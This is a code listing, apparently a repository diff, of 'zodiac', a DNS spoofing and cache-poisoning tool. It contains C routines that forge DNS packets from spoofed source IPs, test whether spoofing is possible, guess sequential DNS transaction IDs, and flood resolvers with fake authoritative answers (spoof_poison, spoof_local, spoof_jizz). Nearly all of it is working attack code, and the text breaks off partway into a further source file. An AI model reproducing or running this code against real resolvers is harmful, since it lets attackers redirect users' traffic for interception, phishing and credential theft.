*
* build a dns domain label sequence out of a printable domain name
* store the resulting domain in `denc', get the printable domain
* from `domain'.
*
* return 0 on failure
* return length of the created domain (include suffixing '\x00')
*/
int dns_build_domain (unsigned char **denc, char *domain);
/* dns_build_domain_dotlen
*
* helper routine, determine the length of the next label in a human
* printed domain name
*
* return the number of characters until an occurance of \x00 or '.'
*/
int dns_build_domain_dotlen (char *label);
/* dns_packet_send
*
* send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
* source port `prt_src' and destination port `prt_dst'. the dns header
* data is filled with `dns_id', the dns identification number of the
* packet, `flags', which are the 16bit flags in the dns header, then
* four count variables, each for a dns segment: `count_q' is the number
* of queries, `count_a' the number of answers, `count_ns' the number of
* nameserver entries and `count_ad' the number of additional entries.
* the real dns data is aquired from the dns packet data `pd'.
* the dns data should be constructed using the dns_build_* functions.
* if the packet should be compressed before sending it, `compress'
* should be set to 1.
*
* return 0 on success
* return 1 on failure
*/
int dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
u_short dns_id, u_short flags, u_short count_q, u_short count_a,
u_short count_ns, u_short count_ad, dns_pdata *pd, int compress);
#endif

21
dns/zodiac/src/dns-mass.c Normal file
View file

@ -0,0 +1,21 @@
/* zodiac - advanced dns spoofer
*
* by team teso
*
* mass routines (mass resolving, mass versioning, etc...)
*/
/* dm_resolve
*
* dns mass resolve function. resolves at a fixed rate `rate' per second
* names from file `hostfile', one per line. outputs to `ipfile'.
* to do this it spawns two threads, one collecting and one packet-firing
* thread. timeout `timeout' is used per lookup.
* beware, it might eat system resources :)
*
* return in any case
*/
void
dm_resolve (

View file

@ -0,0 +1,269 @@
/*
* new OO-interface to spoofing functions.
* hopefully this will make it easier to do 'batch' id spoofs.
* i.e. A and PTR at the same time, while maintaining flexibility.
*
* -Smiler
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <stdlib.h>
#include <pthread.h>
#include "dns-spoof-int.h"
#include "dns-spoof.h"
#include "dns-build.h"
#include "common.h"
static void spoof_id_destroy (spoof_style_id *spoof_id);
static void spoof_local_destroy (spoof_style_local *spoof_local);
static void spoof_jizz_destroy (spoof_style_jizz *spoof_jizz);
/* functions to carry out the spoofs, with certain
* variations.
*/
void
spoof_do (spoof_base *spoof)
{
switch (spoof->spoof_style) {
case SPOOF_STYLE_LOCAL:
spoof_local (&spoof->spoof.local_spoof);
break;
case SPOOF_STYLE_JIZZ:
spoof_jizz (&spoof->spoof.jizz_spoof);
break;
case SPOOF_STYLE_SNIFFID:
spoof_dnsid (&spoof->spoof.id_spoof);
break;
}
return;
}
void *
_spoof_do_threaded (void *arg)
{
spoof_do ((spoof_base *)arg);
spoof_destroy ((spoof_base *)arg);
return (NULL);
}
pthread_t
spoof_do_threaded (spoof_base *spoof)
{
pthread_t tid;
pthread_create (&tid, NULL, _spoof_do_threaded, (void *)spoof);
return (tid);
}
/*
* create a new spoof strucuture for local spoofs.
* return NULL on error.
*/
spoof_base *
spoof_local_new (char *victim, char *from, char *to, char *dns, char *dns_ip, int type)
{
spoof_base *ptr;
spoof_style_local *local;
ptr = (spoof_base *) xcalloc (1, sizeof(spoof_base));
ptr->spoof_style = SPOOF_STYLE_LOCAL;
local = &ptr->spoof.local_spoof;
local->spoof_victim = victim;
local->spoof_from = from;
local->spoof_to = to;
local->local_dns = dns;
local->local_dns_ip = dns_ip;
local->spoof_type = type;
return (ptr);
}
/*
* create a new spoof structure for jizz spoofing.
* return NULL on error.
*/
spoof_base *
spoof_jizz_new (char *ns, char *domain, char *local_ip, char *spoof_from,
char *spoof_to)
{
spoof_base *ptr;
spoof_style_jizz *jizz;
ptr = (spoof_base *) xcalloc (1, sizeof(spoof_base));
ptr->spoof_style = SPOOF_STYLE_JIZZ;
jizz = &ptr->spoof.jizz_spoof;
jizz->nameserver = ns;
jizz->local_domain = domain;
jizz->local_dns_ip = local_ip;
jizz->spoof_from = spoof_from;
jizz->spoof_to = spoof_to;
return (ptr);
}
/*
* allocate, init and return a new spoof structure for id spoofing
* return NULL on error.
*/
spoof_base *
spoof_id_new (char *ns, char *local_domain)
{
spoof_base *ptr;
ptr = (spoof_base *)xcalloc (1, sizeof(spoof_base));
ptr->spoof_style = SPOOF_STYLE_SNIFFID;
ptr->spoof.id_spoof.nameserver = ns;
ptr->spoof.id_spoof.local_domain = local_domain;
ptr->spoof.id_spoof.id_cnt = 0;
ptr->spoof.id_spoof.root = NULL;
return (ptr);
}
/*
* add an id spoof to the linked list.
* only supports T_A, T_PTR and T_NS atm.
* spoof_from_domain can be NULL.
*
* return 0 on success
* return -1 on error
*/
int
spoof_id_add (spoof_base *base, int type, char *spoof_from,
char *spoof_to, char *spoof_from_domain)
{
spoof_style_id *ptr;
spoof_id_list *new,
*link_ptr;
if (base->spoof_style != SPOOF_STYLE_SNIFFID)
return (-1);
ptr = &base->spoof.id_spoof;
if (ptr->id_cnt >= SPOOF_ID_MAX)
return (-1);
if (type != T_A && type != T_PTR && type != T_NS)
return (-1);
new = (spoof_id_list *) xcalloc (1, sizeof(spoof_id_list));
memset (new, 0, sizeof(spoof_id_list));
new->next = NULL;
new->spoof_type = type;
new->spoof_from = spoof_from;
new->spoof_to = spoof_to;
if (spoof_from_domain == NULL) {
if (type != T_PTR) {
new->spoof_from_domain = dns_domain (new->spoof_from);
if (new->spoof_from_domain == NULL)
return (-1);
} else {
new->spoof_from_domain = dns_ptr_domain (new->spoof_from);
if (new->spoof_from_domain == NULL)
return (-1);
}
} else {
new->spoof_from_domain = spoof_from_domain;
}
/* link in the structure */
link_ptr = ptr->root;
if (link_ptr == NULL) {
ptr->root = new;
} else {
while (link_ptr->next) link_ptr = link_ptr->next;
link_ptr->next = new;
}
/* and increase the spoof count */
++ptr->id_cnt;
return (0);
}
/*
* Free a spoof_id structure
*/
static void
spoof_id_destroy (spoof_style_id *spoof_id)
{
spoof_id_list *link, *tmp;
for (link = spoof_id->root; link; link = tmp) {
tmp = link->next;
/* free the contents of the link */
free (link->spoof_from);
free (link->spoof_to);
/* then free the link structure */
free (link);
}
free (spoof_id->nameserver);
free (spoof_id->local_domain);
return;
}
/*
* Free a local spoof structure.
*/
static void
spoof_local_destroy (spoof_style_local *spoof_local)
{
free (spoof_local->spoof_victim);
free (spoof_local->spoof_from);
free (spoof_local->spoof_to);
free (spoof_local->local_dns);
free (spoof_local->local_dns_ip);
return;
}
/*
* Free a jizz structure.
*/
static void
spoof_jizz_destroy (spoof_style_jizz *spoof_jizz)
{
free (spoof_jizz->nameserver);
free (spoof_jizz->local_domain);
free (spoof_jizz->local_dns_ip);
free (spoof_jizz->spoof_from);
free (spoof_jizz->spoof_to);
return;
}
/*
* Free a general spoof structure.
*/
void
spoof_destroy (spoof_base *spoof_base)
{
switch (spoof_base->spoof_style) {
case SPOOF_STYLE_SNIFFID:
spoof_id_destroy(&spoof_base->spoof.id_spoof);
break;
case SPOOF_STYLE_LOCAL:
spoof_local_destroy(&spoof_base->spoof.local_spoof);
break;
case SPOOF_STYLE_JIZZ:
spoof_jizz_destroy(&spoof_base->spoof.jizz_spoof);
break;
default:
/* hmm */
}
free (spoof_base);
return;
}

View file

@ -0,0 +1,82 @@
/*
* New, hopefully more flexible interface to dns-spoof.c
* If anyone can come up with more imaginative/descriptive nomenclature,
* please change it :/
*/
#ifndef Z_DNS_SPOOF_INT_H
#define Z_DNS_SPOOF_INT_H
#include <pthread.h>
#define SPOOF_ID_MAX 3 /* maximum number of id spoofs in a single request */
#define SPOOF_STYLE_SNIFFID 0x1
#define SPOOF_STYLE_LOCAL 0x2
#define SPOOF_STYLE_JIZZ 0x3
#define SPOOF_STYLE_SNOOFID 0x4 /* not supported yet ! */
typedef struct spoof_style_jizz {
char *nameserver,
*local_domain,
*local_dns_ip,
*spoof_from,
*spoof_to;
} spoof_style_jizz;
typedef struct spoof_style_local {
int spoof_type; /* A, PTR.. */
char *spoof_victim,
*spoof_from,
*spoof_to,
*local_dns,
*local_dns_ip;
} spoof_style_local;
typedef struct spoof_id_list {
struct spoof_id_list *next;
int spoof_type; /* A, PTR.. */
char *spoof_from,
*spoof_from_domain,
*spoof_to;
} spoof_id_list;
typedef struct spoof_style_id {
char *nameserver, /* victim nameserver */
*local_domain; /* guess */
int id_cnt; /* number of spoofs requested */
spoof_id_list *root; /* linked list of spoofs */
} spoof_style_id;
typedef struct spoof_base {
int spoof_style; /* id, jizz, local ... */
union {
spoof_style_id id_spoof;
spoof_style_local local_spoof;
spoof_style_jizz jizz_spoof;
} spoof;
} spoof_base;
spoof_base *spoof_jizz_new (char *ns, char *domain, char *local_ip,
char *spoof_from, char *spoof_to);
spoof_base *spoof_id_new (char *ns, char *local_domain);
int spoof_id_add (spoof_base *base, int type, char *spoof_from,
char *spoof_to, char *spoof_from_domain);
spoof_base *spoof_local_new (char *victim, char *from, char *to,
char *dns, char *dns_ip, int type);
void spoof_destroy (spoof_base *spoof_base);
void spoof_do (spoof_base *base);
pthread_t spoof_do_threaded (spoof_base *base);
#endif

556
dns/zodiac/src/dns-spoof.c Normal file
View file

@ -0,0 +1,556 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* spoofing routines
*/
#include <stdlib.h>
#include <string.h>
#include "common.h"
#include "dns.h"
#include "dns-build.h"
#include "dns-spoof.h"
#include "dns-spoof-int.h"
#include "dns-tools.h"
#include "dnsid.h"
#include "dnsq.h"
#include "network.h"
#include "output.h"
#include "packet.h"
#include "zodiac.h"
extern struct in_addr localip;
/* spoof_local
*
* install a spoof handler that will transparently spoof local requests.
* the calling function has to launch an extra thread to do this in
* background *yeah*.
*
* used spoof_style_local variables:
*
* spoof_victim what local lookupers should be affected
* spoof_type T_A (name to ip) or T_PTR (ip to domain) spoof
* spoof_from ip / host that should be spoofed
* spoof_to wrong resolve for spoof_from
* local_dns nameserver that should be responsible for the domain
* local_dns_ip ip of the responsible nameserver local_dns
*
* return in any case
*/
void
spoof_local (spoof_style_local *cs)
{
int n; /* temporary return value */
int desc; /* filter descriptor */
struct in_addr ip_src, ip_dst; /* ip's (temporary) */
char *query;
/* from any address to the local nameserver
*/
ip_src.s_addr = net_resolve (cs->spoof_victim); /* NULL = any, != NULL, only this client */
ip_dst.s_addr = net_resolve ("*"); /* can be "*" */
if (cs->spoof_type == T_PTR) {
/* convert the ip address to a encoded ptr query within
* the .in-addr.arpa domain :)
*/
query = dns_build_ptr (cs->spoof_from);
} else if (cs->spoof_type == T_A) {
/* domain name is equal to decoded query :)
*/
query = xstrdup (cs->spoof_from);
} else {
return;
}
/* install a virtual dns packet filter
*/
desc = dq_filter_install (
ip_src, /* dns queries from source IP */
ip_dst, /* nameserver or any IP */
0, /* source port, we don't care :) */
53, /* dns port, we care about queries */
0, 0, 0, /* a local spoof, we don't care about the DNS ID's */
query); /* query content (only spoof a name / ip) */
/* installing the handler shouldn't cause any error :-) hopefully
*/
if (desc == -1)
return;
/* wait indefinitly
*/
while (dq_filter_wait (desc, NULL) == 1) {
char *ip_src, *ip_dst;
ip_hdr *ip; /* pointer to ip header */
udp_hdr *udp; /* pointer to udp header */
dns_hdr *dns; /* pointer to dns header */
unsigned char *dns_data; /* pointer to dns data part within packet */
dns_pdata *pd; /* dns data part of the packet */
dq_packet *catch = /* catched packet */
dq_p_get (desc);
char *dns_sld = NULL;
/* if we didn't caught the packet (?), abort
*/
if (catch == NULL) {
m_printf (ms, ms->winproc, "[zod] !ERROR! FILTER TRIGGERED, BUT NO PACKET\n");
goto sp_local_fail;
}
m_printf (ms, ms->winproc, "[zod] SPOOF LOCAL GOT PACKET\n");
/* axe the packet, *yeah*
*/
pq_offset (catch->packet, &ip, &udp, &dns, &dns_data);
/* get spoofed nameserver domain, depending on spoof type =)
*/
if (cs->spoof_type == T_A)
dns_sld = dns_domain (cs->spoof_from);
else if (cs->spoof_type == T_PTR)
dns_sld = dns_domain (cs->spoof_to);
pd = dns_build_new ();
dns_build_q (pd, cs->spoof_from, cs->spoof_type, C_IN);
dns_build_rr (pd, cs->spoof_from, cs->spoof_type, C_IN, 86400, cs->spoof_to);
dns_build_rr (pd, dns_sld, T_NS, C_IN, 86400, cs->local_dns);
dns_build_rr (pd, cs->local_dns, T_A, C_IN, 86400, cs->local_dns_ip);
/* fire the packet, yeah :)
* flip source/destination ip/port, while doing it :)
*/
net_printipa (&ip->ip_dst, &ip_src);
net_printipa (&ip->ip_src, &ip_dst);
n = dns_packet_send (ip_src, ip_dst,
htons (udp->uh_dport), htons (udp->uh_sport), htons (dns->id),
DF_RESPONSE | DF_AA | DF_RD | DF_RA, 1, 1, 1, 1, pd, 1);
free (ip_src);
free (ip_dst);
/* destroy created and catched packets
*/
dns_build_destroy (pd);
dq_p_free (catch);
}
sp_local_fail:
free (query);
dq_filter_uninstall (desc);
/* someone ripped us off, let's do him a favor ;-)
*/
return;
}
/* spoof_ip_check
*
* check whether ip spoofing is possible using the current network.
* to do this it queries the `ns' nameserver for a host within `ourdomain'.
* if we see this ip-spoofed packet the spoof succeeded.
*
* return 1 if we are capable of spoofing
* return 0 if we are not *doh* !
* return -1 if not even unspoofed packets get through
*/
int
spoof_ip_check (char *ns, char *ourdomain)
{
char *rnd_aa_host;
dns_pdata *qpacket;
struct in_addr s_addr,
d_addr;
int desc,
n = 0,
test_unspoofed = 0,
test_spoofed = 0;
char *ip_random,
*ip_local;
struct timeval tval;
tval.tv_sec = 25;
tval.tv_usec = 0;
qpacket = dns_build_new ();
rnd_aa_host = dns_build_random (ourdomain, 0);
m_printf (ms, ms->winproc, "[zod] (unspoofed) A? \"%s\" @ %s\n", rnd_aa_host, ns);
dns_build_q (qpacket, rnd_aa_host, T_A, C_IN);
s_addr.s_addr = d_addr.s_addr = net_resolve ("*");
/* some nameservers will query from different ports then 53, so we
* leave the source port of the filter to zero, but we are not going
* to catch our own packets because of own-packets-marking :)
*/
desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);
free (rnd_aa_host);
/* first send an unspoofed packet
*/
ip_local = net_getlocalip ();
dns_packet_send (ip_local, ns, m_random (1024, 50000),
53, m_random (1, 65535), DF_RD, 1, 0, 0, 0, qpacket, 0);
free (ip_local);
test_unspoofed = dq_filter_wait (desc, &tval);
/* not even unspoofed dns packets work !
*/
if (test_unspoofed == 0) {
n = -1;
goto sic_err;
}
dq_filter_uninstall (desc);
dns_build_destroy (qpacket);
qpacket = dns_build_new ();
rnd_aa_host = dns_build_random (ourdomain, 0);
m_printf (ms, ms->winproc, "[zod] (spoofed) A? \"%s\" @ %s\n", rnd_aa_host, ns);
dns_build_q (qpacket, rnd_aa_host, T_A, C_IN);
desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);
free (rnd_aa_host);
/* now try with a spoofed one
*/
ip_random = ip_get_random ();
dns_packet_send (ip_random, ns, m_random (1024, 50000),
53, m_random (1, 65535), DF_RD, 1, 0, 0, 0, qpacket, 0);
free (ip_random);
test_spoofed = dq_filter_wait (desc, &tval);
if (test_spoofed != 0)
n = 1; /* fear the spewfer */
sic_err:
dns_build_destroy (qpacket);
dq_filter_uninstall (desc);
return (n);
}
/* spoof_query
*
* ask a nameserver `nameserver' for a random host inside our domain
* `ourdomain'. wait for a question to our local ip from this nameserver
* for a maximum duration of `timeout' seconds.
* Returns the address of the querying nameserver to the address pointed
* to by proxy. -smiler 990925.
*
* return 1 if the nameserver responded
* return 0 if it didn't
*/
int
spoof_query (char *nameserver, char *ourdomain, int timeout, struct in_addr *proxy)
{
int desc;
int n = 0;
dns_pdata *qpacket; /* query packet data */
char *rnd_aa_host; /* random authoritative domain */
char *local_ip;
struct in_addr s_addr,
d_addr;
struct timeval tv;
struct timeval *tval = &tv;
local_ip = net_getlocalip ();
qpacket = dns_build_new ();
rnd_aa_host = dns_build_random (ourdomain, 0);
m_printf (ms, ms->winproc, "[zod] A? \"%s\" @ %s\n", rnd_aa_host, nameserver);
dns_build_q (qpacket, rnd_aa_host, T_A, C_IN);
s_addr.s_addr = net_resolve (/*nameserver*/ "*");
d_addr.s_addr = net_resolve (local_ip);
desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);
free (rnd_aa_host);
dns_packet_send (local_ip, nameserver, m_random (1024, 50000),
53, m_random (1, 65535), DF_RD, 1, 0, 0, 0, qpacket, 0);
dns_build_destroy (qpacket);
free (local_ip);
if (timeout == 0) {
tval = NULL;
} else {
tv.tv_usec = 0;
tv.tv_sec = timeout;
}
n = dq_filter_wait (desc, tval);
if (n != 0) {
dq_packet *catch;
catch = dq_p_get(desc);
if (!catch) {
m_printf(ms, ms->winproc, "[zod] filter error!\n");
return 0;
}
proxy->s_addr = ((ip_hdr *)catch->packet)->ip_src.s_addr;
}
dq_filter_uninstall (desc);
return (n);
}
/* spoof_jizz
*
* launch a jizz spoof according to the information in the configset `cs'.
* the caller function should create a new thread and fire this function in
* background
*
* expect:
*
* cs->
* nameserver nameserver to jield cache up
* local_domain domain name, the local dns is authoritative for
* local_dns_ip ip of the nameserver the query will be directed to
* spoof_from domain name to do a A/PTR spoof on
* spoof_to ip to do a PTR/A spoof on
*
* return in any case :)
*/
void
spoof_jizz (spoof_style_jizz *cs)
{
u_short src_prt = m_random (1024, 65535);
u_short dns_id = m_random (1, 65535);
int desc;
struct in_addr s_addr,
d_addr;
dns_pdata *qpacket; /* query packet data */
dns_pdata *apacket; /* answer packet data */
char *rnd_aa_host; /* random authoritative domain */
char local_ip[20];
net_printip (&localip, local_ip, sizeof(local_ip) - 1);
/* first construct a query packet
*/
qpacket = dns_build_new ();
rnd_aa_host = strdup (cs->local_domain);
/* rnd_aa_host = dns_build_random (cs->local_domain); */
dns_build_q (qpacket, rnd_aa_host, T_SOA, C_IN);
/* also construct an answer packet (to save time)
*/
apacket = dns_build_new ();
dns_build_q (apacket, rnd_aa_host, T_SOA, C_IN);
dns_build_rr (apacket, rnd_aa_host, T_A, C_IN, 120, local_ip);
dns_build_rr (apacket, cs->spoof_from, T_A, C_IN, 120, cs->spoof_to);
dns_build_rr (apacket, dns_domain (cs->local_domain), T_A, C_IN, 120,
local_ip);
dns_build_rr (apacket, dns_domain (cs->local_domain), T_NS, C_IN, 120,
dns_domain (cs->local_domain));
dns_build_rr (apacket, cs->spoof_to, T_PTR, C_IN, 120,
cs->spoof_from);
/* install a packet filter
*/
s_addr.s_addr = net_resolve ("*");
d_addr.s_addr = net_resolve (local_ip);
desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);
free (rnd_aa_host);
free (local_ip);
if (desc == -1)
return;
/* launch query packet, then destroy it :)
* spoof here if you want to, i don't want =)
*/
dns_packet_send (local_ip, cs->nameserver, src_prt, 53, dns_id, 0, 1, 0, 0, 0, qpacket, 0);
dns_build_destroy (qpacket);
/* wait for the packet
*/
if (dq_filter_wait (desc, NULL) == 1) {
char *ip_src, *ip_dst;
ip_hdr *ip; /* pointer to ip header */
udp_hdr *udp; /* pointer to udp header */
dns_hdr *dns; /* pointer to dns header */
unsigned char *dns_data; /* pointer to dns data part within packet */
dq_packet *catch = /* catched packet */
dq_p_get (desc);
if (catch == NULL) {
m_printf (ms, ms->winproc, "[zod] !ERROR! FILTER TRIGGERED, BUT NO PACKET\n");
goto sp_local_fail;
}
pq_offset (catch->packet, &ip, &udp, &dns, &dns_data);
net_printipa (&ip->ip_dst, &ip_src);
net_printipa (&ip->ip_src, &ip_dst);
/* launch answer packet
*/
dns_packet_send (ip_src, ip_dst, htons (udp->uh_dport), htons (udp->uh_sport),
htons (dns->id), DF_RESPONSE | DF_AA | DF_RD | DF_RA,
1, 3, 1, 1, apacket, 1);
free (ip_src);
free (ip_dst);
dq_p_free (catch);
}
/* uninstall packet filter
* hope, we spoofed, yeah :-)
*/
sp_local_fail:
dns_build_destroy (apacket);
}
void
spoof_dnsid (spoof_style_id *cs)
{
struct in_addr *auth_ns[SPOOF_ID_MAX],
proxy;
char proxy_str[20];
spoof_id_list *link;
int i = 0,
tries = 0,
cnt = 0;
int dns_id;
struct timeval tv;
unsigned long int flags;
if (cs->id_cnt > SPOOF_ID_MAX) /* shouldn't happen */
return;
for (link = cs->root; link; link = link->next, i++) {
int err;
auth_ns[i] = dt_ns_get_auth (cs->nameserver,
link->spoof_from_domain, &err);
if (auth_ns[i] == NULL) {
m_printf (ms, ms->winproc, "[zod] couldn't get list of authority for %s: %s\n",
cs->nameserver, dterrlist[err]);
return;
}
}
m_printf (ms, ms->winproc, "[zod] trying to get my hands on the dns id\n");
while ((cnt < 3) && (tries < 5)) {
if (spoof_query (cs->nameserver, cs->local_domain, 10, &proxy))
cnt++;
tries++;
}
net_printip (&proxy, proxy_str, sizeof (proxy_str) - 1);
dns_id = id_get (proxy_str, &tv, &flags);
if (dns_id == 0) {
m_printf (ms, ms->winproc, "[zod] welp, i didn't manage to get the magic id :(\n");
return;
} else if ((flags & IDF_SEQ) != IDF_SEQ) {
m_printf (ms, ms->winproc, "[zod] nameserver responded, but has nonsequential id's :((\n");
return;
}
m_printf (ms, ms->winproc, "[zod] received responses from: %s\n", proxy_str);
m_printf (ms, ms->winproc, "[zod] sequential id: %hu [age: %d]\n", dns_id, tv.tv_sec);
/* poison the cache */
m_printf (ms, ms->winproc, "[zod] poisoning... phear\n");
i = 0;
/* we start with the dns_id here, but in case it is a windows
* nameserver we don't go through the mess, we just send
* dns id's of 0 to 20 out, which will most likely be ok. -sc
*/
if ((flags & IDF_WINDUMB) == IDF_WINDUMB) {
dns_id = 0;
m_printf (ms, ms->winproc, "[zod] remote is windows, trying id 0 to 20\n");
}
for (link = cs->root ; link != NULL ; link = link->next, i++) {
spoof_poison (cs->nameserver, proxy, auth_ns[i], dns_id + i,
link->spoof_from, link->spoof_to, link->spoof_type);
}
return;
}
/* spoof_poison
*
* try to poison the cache of 'victim'
* send a spoofed request to victim, and /quickly/ send responses
* from *all* ipz in the array '*auth_ns' with ids close to 'victim_id'
* to 'proxy'
*
* Note: if itz already cached, then it wont work!
*
* -smiler
*/
void
spoof_poison (char *victim, struct in_addr proxy, struct in_addr *auth_ns,
int dns_id, char *spoof_from, char *spoof_to, int type)
{
dns_pdata *spoof_query,
*fake_reply;
char proxy_str[20],
localip_str[20],
ns_str[20];
int i,
j, k;
if (type != T_A && type != T_PTR && type != T_NS)
return;
net_printip (&proxy, proxy_str, sizeof (proxy_str) - 1);
net_printip (&localip, localip_str, sizeof (localip_str) - 1);
spoof_query = dns_build_new ();
fake_reply = dns_build_new ();
dns_build_q (spoof_query, spoof_from, type, C_IN);
dns_build_q (fake_reply, spoof_from, type, C_IN);
dns_build_rr (fake_reply, spoof_from, type, C_IN, 100000, spoof_to);
for (k = 0; k < 2; k++)
dns_packet_send (localip_str, victim, m_random (1024, 50000),
53, m_random (1, 65535), DF_RD, 1, 0, 0, 0, spoof_query, 0);
for (k = 0; k < 2; k++)
for (i = dns_id + 1; i < (dns_id + 20); ++i) {
for (j = 0; auth_ns[j].s_addr != INADDR_ANY; ++j) {
net_printip (&auth_ns[j], ns_str, sizeof (ns_str) - 1);
dns_packet_send (ns_str, proxy_str, 53, 53, i,
DF_RESPONSE | DF_AA, 1, 1, 0, 0, fake_reply, 0);
}
}
dns_build_destroy (fake_reply);
dns_build_destroy (spoof_query);
return;
}

View file

@ -0,0 +1,23 @@
/* zodiac - advanced dns spoofer
*
* spoofing routines include file
*
* by scut / teso
*/
#ifndef Z_DNS_SPOOF_H
#define Z_DNS_SPOOF
#include <arpa/inet.h>
#include "dns-spoof-int.h"
int spoof_ip_check (char *ns, char *ourdomain);
int spoof_query (char *nameserver, char *ourdomain, int timeout, struct in_addr *proxy);
void spoof_local (spoof_style_local *cs);
void spoof_jizz (spoof_style_jizz *cs);
void spoof_dnsid (spoof_style_id *cs);
void spoof_poison (char *ns, struct in_addr proxy, struct in_addr *auth_ns,
int dns_id, char *spoof_from, char *spoof_to, int type);
#endif

139
dns/zodiac/src/dns-tag.c Normal file
View file

@ -0,0 +1,139 @@
/* zodiac - advanced dns spoofer
*
* by team teso
*
* dns tag routines
*/
#define _Z_DNS_TAG_C_MAIN
#include <sys/time.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>
#include "common.h"
#include "dns-tag.h"
#include "network.h"
/* dns tag linked list root pointer
*/
dns_tag *dns_tag_root = NULL;
pthread_mutex_t dns_tag_mutex = PTHREAD_MUTEX_INITIALIZER;
unsigned long int dns_tag_time_expire = 5; /* keep 5 seconds */
int dns_print_own_packets = 1;
void
dns_tag_add (char *ip_src, char *ip_dst, unsigned short int prt_src,
unsigned short int prt_dst, unsigned short int dns_id)
{
dns_tag *this;
dns_tag *new = xcalloc (1, sizeof (dns_tag));
new->ip_src.s_addr = net_resolve (ip_src);
new->ip_dst.s_addr = net_resolve (ip_dst);
new->prt_src = prt_src;
new->prt_dst = prt_dst;
new->dns_id = dns_id;
new->next = NULL; /* last element */
gettimeofday (&new->time_send, NULL);
pthread_mutex_lock (&dns_tag_mutex);
if (dns_tag_root == NULL) {
dns_tag_root = new;
} else {
for (this = dns_tag_root ; this->next != NULL ;
this = this->next)
;
this->next = new;
}
pthread_mutex_unlock (&dns_tag_mutex);
return;
}
int
dns_tag_check_a (char *ip_src, char *ip_dst, unsigned short int prt_src,
unsigned short int prt_dst, unsigned short int dns_id)
{
struct in_addr ip_src_n,
ip_dst_n;
ip_src_n.s_addr = net_resolve (ip_src);
ip_dst_n.s_addr = net_resolve (ip_dst);
return (dns_tag_check_n (&ip_src_n, &ip_dst_n, prt_src, prt_dst, dns_id));
}
/* quite optimized
*/
int
dns_tag_check_n (struct in_addr *ip_src, struct in_addr *ip_dst,
unsigned short int prt_src, unsigned short int prt_dst,
unsigned short int dns_id)
{
int found = 0; /* found flag, flagged inside loop */
dns_tag *this, **last; /* linked list step pointer */
struct in_addr any;
struct timeval tv_current; /* check expired frames oh yeah */
any.s_addr = net_resolve ("*");
gettimeofday (&tv_current, NULL);
pthread_mutex_lock (&dns_tag_mutex);
last = &dns_tag_root;
for (this = dns_tag_root ; found == 0 && this != NULL ; )
{
found = 1; /* assume "yes", then squash it */
/* check whether the frame has expired
*/
if (tdiff (&this->time_send, &tv_current) >= dns_tag_time_expire) {
dns_tag *old = this;
*last = this->next;
this = this->next;
free (old); /* fear the heap :> */
found = 0;
continue;
} else {
last = &this->next;
}
if (found == 1 && ip_src->s_addr != any.s_addr &&
ip_src->s_addr != this->ip_src.s_addr)
{
found = 0;
}
if (found == 1 && ip_dst->s_addr != any.s_addr &&
ip_dst->s_addr != this->ip_dst.s_addr)
{
found = 0;
}
if (found == 1 && prt_src != 0 && prt_src != this->prt_src)
found = 0;
if (found == 1 && prt_dst != 0 && prt_dst != this->prt_dst)
found = 0;
if (found == 1 && dns_id != 0 && dns_id != this->dns_id)
found = 0;
this = this->next;
}
pthread_mutex_unlock (&dns_tag_mutex);
return (found);
}

78
dns/zodiac/src/dns-tag.h Normal file
View file

@ -0,0 +1,78 @@
/* zodiac - advanced dns spoofer
*
* by team teso
*
* dns tag routines include file
*/
#ifndef _Z_DNS_TAG_H
#define _Z_DNS_TAG_H
#include <netinet/in.h>
#ifndef _Z_DNS_TAG_C_MAIN
extern int dns_print_own_packets;
#endif
/* dns tag linked list element
*/
typedef struct dns_tag {
struct dns_tag *next; /* linked list pointer */
struct in_addr ip_src; /* source ip */
struct in_addr ip_dst; /* destination ip */
unsigned short int prt_src; /* udp source port */
unsigned short int prt_dst; /* udp destination port */
unsigned short int dns_id; /* dns id of the frame */
struct timeval time_send; /* time the frame was send */
} dns_tag;
/* dns_tag_add
*
* create a new linked list element with the given properties
*
* return in any case
*/
void
dns_tag_add (char *ip_src, char *ip_dst, unsigned short int prt_src,
unsigned short int prt_dst, unsigned short int dns_id);
/* dns_tag_check_a
*
* check whether the packet frame is in the queue. `ip_*' can be `*' if no
* address checking should be performed. `prt_*' and `dns_id' can be zero if
* no comparison on them should be performed.
*
* return 1 if it is
* return 0 if it is not
*/
int
dns_tag_check_a (char *ip_src, char *ip_dst, unsigned short int prt_src,
unsigned short int prt_dst, unsigned short int dns_id);
/* dns_tag_check_n
*
* check whether the packet frame is in the queue. `ip_*' can be INADDR_ANY
* if no address checking should be performed. `prt_*' and `dns_id' can be
* zero if no comparison on them should be performed.
*
* return 1 if the packet frame was found
* return 0 if the packet frame was not found
*/
int
dns_tag_check_n (struct in_addr *ip_src, struct in_addr *ip_dst,
unsigned short int prt_src, unsigned short int prt_dst,
unsigned short int dns_id);
#endif

501
dns/zodiac/src/dns-tools.c Normal file
View file

@ -0,0 +1,501 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns tool routines
*/
#include <sys/time.h>
#include <unistd.h>
#include <stdlib.h>
#include <libnet.h>
#include "common.h"
#include "dns.h"
#include "dns-tools.h"
#include "dnsq.h"
#include "dns-build.h"
#include "dns-spoof.h"
#include "dnsq.h"
#include "network.h"
#include "output.h"
#include "packet.h"
#include "zodiac.h"
#define DT_SECT_AN 0x1
#define DT_SECT_NS 0x2
#define DT_SECT_AR 0x3
/* keep local functions private
*/
static void dt_process_pkt (dt_answer *ans, dq_packet *pkt, u_short type);
static dt_section *dt_choose_sect(dt_answer *ans, int sect);
static void dt_answer_add_A (dt_answer *ans, char *name, struct in_addr ip,
u_short type, int sect);
static void dt_answer_add_normal (dt_answer *ans, char *name, char *label,
u_short type, int sect);
static rrec *dt_search_sect (dt_section *sect, u_short type, char *name);
/* Access with DT_ANSWER_* defines.
*/
char *dterrlist[] = { "Success",
"Response Timed Out",
"Nameserver returned error",
"Error resolving nameserver",
"Unknown type",
"Filter error"};
/* dt_ns_get_auth
*
